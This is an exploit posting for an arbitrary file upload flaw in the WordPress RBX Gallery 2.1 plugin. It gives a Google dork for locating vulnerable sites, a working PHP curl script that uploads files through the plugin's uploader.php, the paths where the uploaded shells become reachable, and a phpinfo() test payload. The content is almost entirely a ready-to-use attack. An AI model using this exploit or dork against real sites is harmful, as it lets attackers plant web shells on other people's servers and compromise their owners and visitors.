xploit wp

1. ##################################################
2. # Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File
3. Upload Vulnerability
4. # Version : 2.1
5. # Link : http://wordpress.org/extend/plugins/rbxgallery/
6. # Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip
7. # Date : 03-06-2012
8. # Google Dork : inurl:/wp-content/plugins/rbxgallery/
9. # Author : Sammy FORGIT - sam at opensyscom dot fr -
10. http://www.opensyscom.fr
11. ##################################################
12.  
13.  
14. Exploit :
15.  
16. PostShell.php
17. <?php
18.  
19. $uploadfile="lo.php";
20. $uploadfile2="db.php";
21. $ch =
22. curl_init("http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php");
23. curl_setopt($ch, CURLOPT_POST, true);
24. curl_setopt($ch, CURLOPT_POSTFIELDS,
25. array('images[0]'=>"@$uploadfile",
26. 'images[1]'=>"@$uploadfile2",
27. 'Submit'=>'submit'));
28. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
29. $postResult = curl_exec($ch);
30. curl_close($ch);
31. print "$postResult";
32.  
33. ?>
34.  
35. Shell Access :
36. http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php
37. http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php
38.  
39. lo.php
40. <?php
41. phpinfo();
42. ?>